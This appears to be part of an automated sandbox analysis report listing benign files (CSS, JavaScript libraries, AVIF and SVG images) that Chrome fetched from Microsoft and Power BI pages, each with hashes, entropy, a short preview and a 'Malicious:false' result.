                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Hero_BPI_icon1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=96&hei=96&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe.......`...`....pixi............av1C........colrnclx...........ipma...................mdat........`...B2..D....'...$....S=N.R.L(....#.`.A+...B......g.....6P......I.)..h4.l.a.^W...Fc.....^.BDBbW...E.z(.k/... ...B..M.>.L.B\r....".`.;.?e.5A..P.1._.Y..~d.u......X...../.>{.TNZ.K/...3...{2.z....\yl.@...b.`m..%.6<'.. P...).B/\Y_...v.3X.....]8........T.......$Q.q...../...B.....o.....C...3..>..h.......n..C......H.{....V..Kd......rU..{1Nx...t...V5N,..[.[5)R.G.{V.rt<...-.......`i...^.7)....m.nF(....0.R9>#...k....?B.s..x..a.&.......'.T..c.XG.73O.-.+t8DR..F.^fd...{..~e9b.9L.[8.......w..N...u..&.(.op.5.!%k........v.n`.q .s..t.!?..].o.......h.O..o..m.wiaT}4.( ..l..{>.E....J.....`1.x.....H..8......"c..`....u..).6.....I.....+.;.l.....&..]V..O..I....gI.)S.....Y,CN. .\.......
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3927), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):3927
                                                                                                                                                                                                          Entropy (8bit):5.20526481753379
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:i+P+GSWasaYAj2DKeDmU5YB0pCLW2sR9Rq:i+P+JWasaYAjgRDmBBqC62sR9Rq
                                                                                                                                                                                                          MD5:50BC89D3D37D2437D09164D95B4B258C
                                                                                                                                                                                                          SHA1:27A948412D6C0E369BE353E3DDA2DD71597F2174
                                                                                                                                                                                                          SHA-256:D54FDC3901EDECCA0B9423901F357E58239DE8C56D26EA56DCBF9F932AB8C9BD
                                                                                                                                                                                                          SHA-512:62B9DF0C834BAD376644B015541BF7145FA5D5E9E87E2C36CAE6CD6F4CA01D36B6F70F5CBABB1A177583423616F6AA56F930828ADD0DFE2FA986D36551593788
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/msonecloudapi/assets/msochead.css
                                                                                                                                                                                                          Preview:header[data-header-footprint="/OfficeProducts/teamsheader, fromService: True"] .feature h1.text-teams{margin:0}header[data-header-footprint="/OfficeProducts/teamsheader, fromService: True"] .feature .card-body .link-group.link-group-col-2{margin-top:35px}[data-component-id=d86b06c2fa504a3e1bfc37d37bc0eee7] .nav-bar{z-index:500}#highlight-ocf2a1 .card-background{margin-top:0;margin-bottom:0}#highlight-ocf2a1 .card-background>img,#highlight-ocf2a1 .card-background>picture{height:100%;width:100%}#layout-container-uid93df .row>.col{align-self:unset!important}@media (min-width:860px){#layout-container-uid93df .row>.col{display:flex}#layout-container-uid93df .col.align-self-start.text-md-left.no-gutters.mb-4.mb-md-0{padding-bottom:1.5rem!important}}:not(.container)>[data-component-id="9ff80f278e2186de9dc83ecbc7bd5dbe"].image-tabs>.row{margin-left:0;margin-right:0}:not(.container)>[data-component-id="9ff80f278e2186de9dc83ecbc7bd5dbe"].image-tabs>.row [class*=col-]{padding-left:0;padding-right
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):406
                                                                                                                                                                                                          Entropy (8bit):4.645093417199183
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:M9BAG1/qAT9BAs1/qKdDYT9BAR6T9BAOk/CMRZcJfRDZ:M9p/qS91/qfT9J9yRC5N
                                                                                                                                                                                                          MD5:F9F2395C582FA601707B7A5DFAE9F05F
                                                                                                                                                                                                          SHA1:27B15AECD0BFDD3B25556AC00755856D4D331E0D
                                                                                                                                                                                                          SHA-256:D7D6D06624D4BDF6935B848DF342CE322D02B58D12BF12149DF92D557E5E9BC4
                                                                                                                                                                                                          SHA-512:F3378927D96B0B172981A821A8C2A16D0F397ED92E835B7C46316FC48350402D972A5411F0FA4C260F205AA1F7917F83F8247BF8A62C7F22E0076B168275B1E9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css
                                                                                                                                                                                                          Preview:.c-uhfh .c-action-trigger.glyph-shopping-cart span:not(.shopping-cart-amount),.c-uhfh .c-action-trigger.glyph-shopping-bag span:not(.shopping-cart-amount){line-height:48px !important}..c-uhfh .c-action-trigger.glyph-shopping-cart:after,.c-uhfh .c-action-trigger.glyph-shopping-bag:after{line-height:43px}..c-uhfh.c-sgl-stck .c-search button{line-height:18px}..msame_Header_name{line-height:44px !important}
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (655)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):476830
                                                                                                                                                                                                          Entropy (8bit):5.504913141773882
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:v+iJyDmVwNQbmAbm8aw+dBABTSO6VCMoouax2fpfJM2ib:vMgY58a+Sjgax28b
                                                                                                                                                                                                          MD5:48DD3E22F922821879E06AFDBBAE1B13
                                                                                                                                                                                                          SHA1:C9A299AB783C87C782F3C1C18ADC861486615F19
                                                                                                                                                                                                          SHA-256:40FBF03763120106011C15B2970BC3F8E3BCA1B58878E79CC3303E6B92496D31
                                                                                                                                                                                                          SHA-512:5F3ABC05096D0E691C248D18F44224F07D97F927B6C1DB1BC2D7F003A80BCD4377B2ECFA47A5F1DF4F061C13AF3E8E28F56F66FA6F41BC561A5EA144B91620E8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*. OneCloud Reimagine v0.308.0. MWF (Moray) v2.8.1. Copyright (c) Microsoft Corporation. All rights reserved.. Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc..*/.'use strict';(function(V,L){"object"===typeof exports&&"undefined"!==typeof module?L(exports):"function"===typeof define&&define.amd?define(["exports"],L):(V="undefined"!==typeof globalThis?globalThis:V||self,L(V.ocrReimagine={}))})(this,function(V){function L(){function b(x,w,y){return Object.defineProperty(x,w,{value:y,enumerable:!0,configurable:!0,writable:!0}),x[w]}function d(x,w,y,R){w=Object.create((w&&w.prototype instanceof c?w:c).prototype);R=new r(R||[]);return A(w,"_invoke",{value:k(x,y,.R)}),w}function a(x,w,y){try{return{type:"normal",arg:x.call(w,y)}}catch(R){return{type:"throw",arg:R}}}function c(){}function e(){}function f(){}function g(x){["next","throw","return"].forEach(function(w){b(x,w,function(y){return this._invoke(w,y)})})}function h(x,w){function y(E,wa,ja,Lb){E=a(x[E],x,wa);if("throw"!==E.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (566)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):61208
                                                                                                                                                                                                          Entropy (8bit):5.486865205392623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:qCLbrNurYZRrfHvWCOqbEC9EbivVZh3ctWNwtBSg646z:qC/purwhfPWCOqbEC9EG3sDP6z
                                                                                                                                                                                                          MD5:F381D5147C85EE687EA8FBEF32C83D37
                                                                                                                                                                                                          SHA1:EB654ABAF1DF5CCB830763D5A40140B5C093C49F
                                                                                                                                                                                                          SHA-256:2D0832B29F1B3347C4B5046C373A635884B76ABAF2DE3FF650EE74D8B46F001E
                                                                                                                                                                                                          SHA-512:CD6B4DEB925037A6C0CF4BAA5AB600891139D99BFB9173D3F3DD4660D281A6266B5709D53770395E7459D9D2060E37F06295E8F9719A21F3EA8433D9E2206E65
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-polyfills.min.ACSHASHf381d5147c85ee687ea8fbef32c83d37.js
                                                                                                                                                                                                          Preview:/*. Copyright (C) 2013-2015 by Andrea Giammarchi - @WebReflection.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):22748
                                                                                                                                                                                                          Entropy (8bit):7.97936926396813
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:93H5mXewvfCMIiEt7AecatAZL07gOwjhOARw53k4T8aTReNKtqQ08081F1:93H5mQB7A+tAZLvOw8Sw504nT0g0p8/1
                                                                                                                                                                                                          MD5:E8842769971110AD7D5770549FD2147F
                                                                                                                                                                                                          SHA1:51F4878C2E87CC489106C97B109E571C432BB37B
                                                                                                                                                                                                          SHA-256:E4E089B3C74831C7A49A60C22F89BA73F4E46088282E2196298BA8B9FF6B840A
                                                                                                                                                                                                          SHA-512:C59A7A36D84AACA95CE09F33D1AAF1214EAE7B13327CF9E577E4E2693E5C00CFE46DBE604BEAB6F9768F5C4F9E2C277691CED141C8C1C1269A2CA26B320D16BE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Hero_PBI_opt2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=3200&hei=1000&qlt=100&fit=constrain"
                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............W....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................W.mdat......j......B2...D........E..S8%.Qm..D+....g...L.A...%....GQQgMA...A,.o..y.)..TH.._O..=.....<?.78....S.....mp.W.vo ..../..n.}.\..^..[;....R.....Ol.U.A..)*..].jEhH.&.......2.Ea....m^...c".!5.(.i.b.y# j.Qu)l..i.....@.......t..,h<.0j..t.......IC.4....._3.Z.S...W.+.W.f..U......C...Yd.."....q.[.'..M.K...M..Zt..Z.PG..(.]b.Ip..:.Vm.T......eFE].....Yb-.K.kV.p..-Y.T.._`$...%..}..P.l....%=.'....K..8......B.9....1N.+...7..6u...G_1...>u+(.[..g..e.CF...f.l.Y.9hK..w..3.G..K9?...m_.n?...y.{.M..v.....B..[8.....B..N....t._=.Y.A..4..w.a...z.....Iw.|%.....m....Q......C.x$...)g.^.<.}.yCx8=`i....U.b......f.c.o..^S.)...*$!x5.......[V...?..|.......)5p.Wz1.:.t.1..d.Ko3[..u6............#W..x)0...\.5..&E.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):422
                                                                                                                                                                                                          Entropy (8bit):4.615395128455073
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:uM4jKgJM1bMoQ4jKgJMQsYEI5pAJM4jKgJMQsYEI5pEXSojC4jKgJ3ClY8pJt4jb:uJJOYsJYI3IJYI3MScHJ3apJoJn2YZ
                                                                                                                                                                                                          MD5:2ADD065651AFB45E8C80967DD7B86A41
                                                                                                                                                                                                          SHA1:32A99770B83F754338EDF886571A91CEDD404F70
                                                                                                                                                                                                          SHA-256:3ECC4A2E8123EAD290D257F820C1CDAFB484A990B5D71AF3F6406CC85978B21B
                                                                                                                                                                                                          SHA-512:F0C2500211E649627495B98D3F040C834B4B3E53FDB31F78C7BED6D4421A70968BF5565BD57A2916423D2CE093FBB188AE78364F13DB31E2E5F589B043F90DFC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing.min.ACSHASH2add065651afb45e8c80967dd7b86a41.css
                                                                                                                                                                                                          Preview:[data-oc-product]:not([data-oc-product*=Success])>*{display:none !important}.[data-oc-product]:not([data-oc-product*=Success]) [data-oc-product="not-available"],[data-oc-product]:not([data-oc-product*=Success]) [data-oc-product="not-available"] *{display:block !important}.[data-ocr-product]:not([data-ocr-product*=Success]):has(.sku__unavailable) [data-oc-product]:not([data-oc-product*=Success]){display:none !important}
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2436
                                                                                                                                                                                                          Entropy (8bit):4.675816652909621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:sebcrpamZrX1/W4/PiIgpzCzj12SoOTj+/3cuq2VqP:seslX1/WIks1Ho8+P1qt
                                                                                                                                                                                                          MD5:3473C7D90BD072EDEE7D20686EB3FD28
                                                                                                                                                                                                          SHA1:82BF670C4E5D3DCF7E4BD8BCAC92A6EED0E87E45
                                                                                                                                                                                                          SHA-256:553B9C191998B0EA72FC6711D6F572C69A812531602EA8C6FFA0F188DFD36423
                                                                                                                                                                                                          SHA-512:974833D87C6295CA5CF485D1B7FE0F88B736F99803F893D858A048B00578D6FEC47A750FA75A4756CDD20571C4DDA0F8BA323E42C70D53E2998BAE61E5D9E33C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:class AjaxUtil {. constructor(opts) {. // Define the base URLs for different environments. const AUTHOR_BASE_URL = {. nonProd: "https://msonecloudapifd-nonprod-adg7arhndebhe8hd.z01.azurefd.net",. prod: "https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net". };. . // Flag indicating if it's an author or non-author environment. const isAuthor = opts.isAuthor; . . // Flag indicating if it's a production or non-production environment. const isProd = opts.isProd; . . // If the 'host' option is provided, use it as the authorHost value; otherwise, select the appropriate base URL based on the isProd flag. const authorHost = AUTHOR_BASE_URL[isProd ? 'prod' : 'nonProd'];. . // Set the nonAuthorHost value as the origin of the current window. const nonAuthorHost = window.location.origin;. . // Set the baseUrl value based on whether it's an author environment or not. If isAuthor is true, use authorHost; otherwise,
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):206
                                                                                                                                                                                                          Entropy (8bit):5.069458334688229
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:U75xFzBUOLsNIVesQQIVYEYUBRa1dLMxPMN8iYpn3MQf:U7b9BU3KVesQdrYYRW6PMfsf
                                                                                                                                                                                                          MD5:131D95CF2EC0E511B73B264FA0C84059
                                                                                                                                                                                                          SHA1:10A0E2E7C996B7C482B64B953F0A443672A55CF7
                                                                                                                                                                                                          SHA-256:44A041D41D7F1E7C09AFBCF26471F2370C7182C915633049DDD27229DDBE2C33
                                                                                                                                                                                                          SHA-512:6D90DB6F32278A6507158107EC23F48C700DF46103F1860B9DE0305662A0755CBCF52EC1F35D9289A4BFEBF6C4C88D1E5C2C76E776C12BCB56A8051AA3343EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/inline-video/v2/cascade-media-player/clientlibs/site.min.ACSHASH131d95cf2ec0e511b73b264fa0c84059.css
                                                                                                                                                                                                          Preview:/*!..To avoid conflict with MWF styles, added a wrapper class.. */.ump-container{max-width:100%}..ump-sm{width:800px}..ump-md{width:1200px}..ump-lg{width:1600px}..ump-xl{width:1920px}..ump-fill{height:100%}
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):92853
                                                                                                                                                                                                          Entropy (8bit):5.2041371017560465
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:6KaLMETTLsEIAcwm42VvYsbxn7e0bKmRhyZ873lLQ2Mt+JS1l31w1n7e0bKmRhyi:Csbx7eWKShyie9wN7eWKShyiebbW
                                                                                                                                                                                                          MD5:8FDE432F4A2277BEFCA055FCB74AE298
                                                                                                                                                                                                          SHA1:B5805E246773B8DA3FC23635A98A906574F2CFEA
                                                                                                                                                                                                          SHA-256:65B754CFB8D01CA1F436D700272E0AF836F8F7776F151F69A9131BBCF281ED5F
                                                                                                                                                                                                          SHA-512:811A57F76EFFEF1FCCB83EAA7FC48247C9A09B7BABB9846449327F50A32162667EA61321868E3575C0E3CCB5648BB9B7EECE5A8273219404BCE2FD8D80FB8727
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/styles/styleLibrary.min.b5805e246773b8da3fc2.css
                                                                                                                                                                                                          Preview:button,input[type=button]{font-family:'Segoe UI Semibold',wf_segoe-ui_semibold,helvetica,arial,sans-serif;background-image:none;box-shadow:none;background-color:var(--button-default-base-fill-color,#eaeaea);padding:6px 18px 6px 18px;border:2px solid var(--button-default-base-fill-color,#eaeaea);border-radius:0;text-shadow:none;font-size:14px;width:auto;line-height:16px;white-space:nowrap;color:var(--button-default-content-color,#000);transition:color .2s,background-color .2s,border-color .2s}button:active:hover,button:focus,button:focus:hover,button:hover,input[type=button]:active:hover,input[type=button]:focus,input[type=button]:focus:hover,input[type=button]:hover{border-color:var(--button-default-hover-content-color,#000);background-color:var(--button-default-hover-fill-color,#f4f4f4);color:var(--button-default-hover-content-color,#000)}button:active,input[type=button]:active{background-color:var(--button-default-active-fill-color,#666);border-color:var(--button-default-active-fill-
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7280), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7280
                                                                                                                                                                                                          Entropy (8bit):5.241987256044728
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:OVAzt5/ij1ivpBmEqH66HCjeIRGR+2lVyNSeau:AAJopCpBmEqHZHnIRGR+wVy/au
                                                                                                                                                                                                          MD5:23278F63089A92EFA413F3B0044A941D
                                                                                                                                                                                                          SHA1:28E1B8B5344398B9905F710946DE50068CAC5460
                                                                                                                                                                                                          SHA-256:D1649009529152EE51C7565D38A409466C57650D989BBBD816F17BBA68F0AFD2
                                                                                                                                                                                                          SHA-512:A29AF3A98BB3B372BB937388FFEDE6F21BE6AF54BBCEB11CEFD2038BA74063FD0B1B0E4CCCF7A8E3028653A5CF981F63B6D19579E02C6F139286ED6F3FE778A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:var powerbi;function addOrUpdateQueryString(e,t,n=window.location.search){let a=parseQueryString(n);return a[e]=t,rebuildQueryString(a)}function clearQueryString(e,t=window.location.search){let n=parseQueryString(t);return delete n[e],rebuildQueryString(n)}function parseQueryString(e=window.location.search){let n={},t=e;var a;if(t&&"?"===t.substr(0,1))for(a of t.substr(1).split("&")){let[e,...t]=a.split("=");var o=t.join("=");n[decodeURIComponent(e)]=decodeURIComponent(o)}return n}function rebuildQueryString(e){let t="",n=!0;for(var a in e)n||(t+="&"),t+=encodeURIComponent(a)+"=",e[a]&&(t+=encodeURIComponent(e[a])),n=!1;return n||(t="?"+t),t}function setCookie(e,t,n="/",a="none",o){o||(o=new Date).setFullYear(o.getFullYear()+1),window&&window.document&&(window.document.cookie=e+" = "+t+";secure;partitioned;path="+n+";expires="+o.toUTCString()+";samesite="+a)}function startBaseMetadataLogRequest(e,t,n){t={url:e,start:new Date,requestId:t};return window[n].push(t),t}function endBaseMetad
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1722
                                                                                                                                                                                                          Entropy (8bit):4.020777473199425
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:gxQF2rOlB551EzolUXePr7KXqxCz5RzArO:XFYOD551EMS+3UqxCX/
                                                                                                                                                                                                          MD5:F6C2E173ED03C4D085455D33742E305C
                                                                                                                                                                                                          SHA1:99DB9C3858FC6F9CF161485E45FC0A096CB493B2
                                                                                                                                                                                                          SHA-256:2D31B49D3A36A6164F2F57161B0F66C49BD0EC8025EDFA960179A8E0E3249E77
                                                                                                                                                                                                          SHA-512:386D931FDFF9B16E66FE37AF4FA8D96F18618BA77F584A2EBF7C75B87007F6B35999EA4393FF11CEC05FB2BA3E04442E04F8E5D15EEF5BC16E6125869D6123B0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Use-Cases5?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=32&hei=32&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                          Preview:<svg width="24" height="25" viewBox="0 0 24 25" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M12.1129 2.12168C8.88107 2.12168 6.26114 4.73546 6.26114 7.95972C6.26114 9.52666 6.87992 10.9494 7.88699 11.998V12.2755C7.23972 12.119 6.58876 12.104 5.96786 12.2109C5.12795 11.0048 4.63565 9.53962 4.63565 7.95972C4.63565 3.83983 7.98334 0.5 12.1129 0.5C16.2425 0.5 19.5902 3.83983 19.5902 7.95972C19.5902 8.94012 19.4006 9.87635 19.056 10.7339C18.991 10.7173 18.9253 10.7018 18.8589 10.6876L17.4382 10.3834C17.7763 9.64514 17.9647 8.82438 17.9647 7.95972C17.9647 4.73546 15.3448 2.12168 12.1129 2.12168ZM10.8126 7.95972C10.8126 7.24322 11.3948 6.66238 12.113 6.66238C12.8312 6.66238 13.4134 7.24322 13.4134 7.95972V11.8517C13.4134 12.234 13.681 12.5643 14.0556 12.6445L18.2446 13.5416C19.4318 13.7959 20.1606 14.9937 19.8386 16.1618L18.3465 21.5759C18.2236 22.0217 17.8421 22.3486 17.3818 22.4024L13.3227 22.8768C13.2886 22.8808 13.2421 22.8747 13.1825 22.8364C13.1194 22.7957 13.0552 22.7259 1
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):9539
                                                                                                                                                                                                          Entropy (8bit):4.727148213062689
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:3lGqnBqPmIa4HAb1WWe13GgkNb2c6cN0JL2xl9zbIPcJtQIgGySjye1nGEZ8UhWW:3l/gPmIaP3U2gkNCcUJL2xlq0Jt6G351
                                                                                                                                                                                                          MD5:9EEA5F80FED74A300CCBBAA4DC41DF2A
                                                                                                                                                                                                          SHA1:08568A33ED8E994237DB997AFABF85723AD7E92D
                                                                                                                                                                                                          SHA-256:32E9B0F50257F381F3F1F3002B7DFD3AF138916429D53FAAC58FD9D0D1550CF4
                                                                                                                                                                                                          SHA-512:0114AC63E722B5628605986B2F2A483F2822CE043F988638DE3DEE202BA96D91B5AE723D585558540A123C9978BEC169C90FF98E567ED74053D57EDE7F1340DB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH9eea5f80fed74a300ccbbaa4dc41df2a.js
                                                                                                                                                                                                          Preview:/**.* This function is to add source parameter through JS in the hyperlink..*/.$(document).ready(function () {. const appendReferrerLinks = document.querySelectorAll('[data-isautoappendreferrer="true"]');. if (appendReferrerLinks.length) {. const lang = "/" + document.documentElement.lang?.toLowerCase();. let currentUrl = window.location.href.toLowerCase().replace(window.location.search, "").replace(lang, "");. if (currentUrl.endsWith("/")) {. .currentUrl = currentUrl.slice(0, -1);. }. const sourceLink = "srcurl=" + encodeURIComponent(currentUrl);. appendReferrerLinks.forEach(link => {. if (!link.href.includes("srcurl=")) {. const separator = link.href.includes("?") ? "&" : "?";. link.href = link.href + separator + sourceLink;. }. });. }.});./**. * Query Parameter Passthrough Utility. *. * This utility updates anchor tags in a web page by modifying the. * 'href' attribut
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):47992
                                                                                                                                                                                                          Entropy (8bit):5.605846858683577
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                          MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                          SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                          SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                          SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (44833), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):44833
                                                                                                                                                                                                          Entropy (8bit):4.68353809586689
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:UwmJg6poctw6SrGNB63v1R8MpyLOB1LnDF3jq9BPVeg3k9OpjL0vq:ULjw6Kd8oM4+
                                                                                                                                                                                                          MD5:C6D1551850659363F4F423E5B091C36C
                                                                                                                                                                                                          SHA1:DF5C326D664E2051922ABE35A83C92151FF6F3F9
                                                                                                                                                                                                          SHA-256:9EBA2A6B1E532B8AB77FEC8DF0BD6B09B3E2B79D75D2F1E913D7D87CAAF6F958
                                                                                                                                                                                                          SHA-512:176E21607DFE07F3D5ADCC25BA57E9ADA4C66981EB1613E8726CFD515B477F08DCDF1638E8F3E9C5C8EB9BADDCA2DA90C856ABC0FD8075453A69F594668EA5C6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/styles/explorationContainer.min.df5c326d664e2051922a.css
